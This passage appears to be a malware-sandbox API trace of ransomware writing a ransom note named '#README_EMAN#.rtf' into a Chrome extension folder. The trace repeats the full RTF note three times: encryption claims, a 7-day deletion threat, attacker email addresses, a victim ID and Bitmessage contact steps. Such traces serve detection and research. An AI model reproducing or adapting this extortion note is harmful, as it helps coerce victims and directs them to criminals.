(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.332] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.332] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.332] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm 